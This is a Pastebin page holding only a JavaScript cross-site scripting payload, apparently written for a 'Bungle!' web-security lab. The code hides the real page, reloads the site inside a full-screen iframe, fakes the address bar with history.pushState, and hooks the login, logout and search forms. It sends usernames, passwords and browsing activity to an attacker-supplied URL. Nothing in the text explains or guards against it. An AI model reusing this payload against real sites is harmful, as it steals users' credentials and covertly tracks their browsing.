Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function payload(attacker) {
- var state = 1
- var states = [];
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- log({event: "nav", uri: href});
- }
- $("html").hide();
- function login(u, p){
- log({event: "login", user: u, pass: p});
- //history.pushState({s: state}, "Bungle!", "/login");
- history.pushState({s: 0}, "Bungle!", "/");
- state += 1
- states.push("/")
- }
- function logout(u){
- log({event: "logout", user: u});
- //history.pushState({s: state}, "Bungle!", "/logout");
- history.pushState({s: 0}, "Bungle!", "/");
- state += 1
- states.push("/")
- }
- function search(ss, u){
- if(u == "")
- log({event: "nav", url: "./search?q="+ss});
- else
- log({event: "nav", user: u, url: "./search?q="+ss});
- //history.pushState({s: state}, "Bungle!", "/search?q="+ss);
- history.pushState({s: state}, "Bungle!", "/search?q="+ss);
- state += 1
- states.push("/search?q="+ss)
- }
- $(function(){
- $("body").html("");
- var iframe = document.createElement("iframe");
- iframe.style.width = "100%";
- iframe.style.height = "100%";
- iframe.style.position = "absolute";
- document.body.appendChild(iframe);
- proxy("./");
- $("html").show()
- iframe.src = "./";
- window.onpopstate = function(event){
- cs = history.state;
- if(history.length == 0) return
- var offset = cs.s - state
- iframe.contentDocument.location.href = states[cs.s];
- //iframe.contentWindow.history.go(-1)
- log({event: "nav", uri: states[cs.s]})
- state += offset
- }
- history.pushState({s:state}, "", "/")
- states.push("/")
- iframe.onload = function(){
- $("iframe").contents().find("#history-list a:contains(\"iframe\")", this).remove()
- $("body", this.contentDocument).one("submit", "form", function(event){
- event.preventDefault();
- event.stopPropagation();
- switch($(this).attr("action")){
- case "./login":
- login($("#username", this).val(), $("#userpass", this).val());
- break;
- case "./logout":
- logout($("#logged-in-user", this).text());
- break;
- case "./search":
- search($("#query", this).val(), $("iframe").contents().find("#logged-in-user", this).text());
- break;
- }
- $(this).submit();
- });
- $("iframe").contents().find("#search-again-btn", this).click(function(){
- proxy("./")
- history.pushState({s: state}, "Bungle!", "/");
- state += 1
- states.push("/")
- })
- }
- });
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement